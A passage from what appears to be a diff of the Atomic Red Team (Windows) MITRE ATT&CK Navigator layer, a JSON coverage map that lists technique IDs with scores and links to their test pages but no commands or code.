Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View 